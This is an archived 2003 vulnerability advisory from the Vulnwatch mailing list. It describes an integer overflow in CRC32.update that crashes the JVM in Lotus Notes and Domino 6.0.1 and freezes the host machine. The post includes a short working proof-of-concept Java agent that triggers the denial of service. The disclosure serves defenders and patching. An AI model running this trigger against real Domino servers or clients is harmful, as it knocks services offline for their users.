Vulnwatch mailing list archives
Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd)
From: Marc Schoenefeld <schonef () uni-muenster de>
Date: Sun, 6 Apr 2003 23:11:27 +0200 (MES)
Hi, the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1 and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory is not freed and causes the server machine (observed on MS XP) to freeze and deny further service. IMPLICATIONS - If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable, - if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable. ANALYSIS: The call to the "update" method of the CRC32 raises an integer overflow in the java java.util.zip.* core libraries which triggers a jni routine that cannot handle the extreme high input value. HISTORY: This vulnerability has already been detected in the Sun JDK (http://developer.java.sun.com/developer/bugParade/bugs/4811913.html), and was disclosed at Blackhat Windows 2003. The background of this bugs is described at www.illegalaccess.org Sincerely Marc Schoenefeld =========================Agent Source Code=========================== import lotus.domino.*; import java.util.zip.*; public class JavaAgent extends AgentBase { public void NotesMain() { try { Session session = getSession(); AgentContext agentContext = session.getAgentContext(); CRC32 crc32 = new CRC32(); crc32.update(new byte[0], 4, 0x7ffffffc); // (Your code goes here) } catch(Exception e) { e.printStackTrace(); } } } =========================Agent Source Code=========================== -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer [ PGP Signature ok - Sun Apr 6 23:10:07 MES 2003 ]
Current thread:
- Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd) Marc Schoenefeld (Apr 06)